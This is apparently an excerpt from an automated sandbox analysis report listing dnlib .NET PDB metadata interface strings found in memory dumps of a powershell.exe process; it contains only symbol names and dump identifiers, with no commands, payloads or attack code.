              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.380562740.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.380118377.00000000002A9000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.pdb source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.380118377.00000000002A9000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
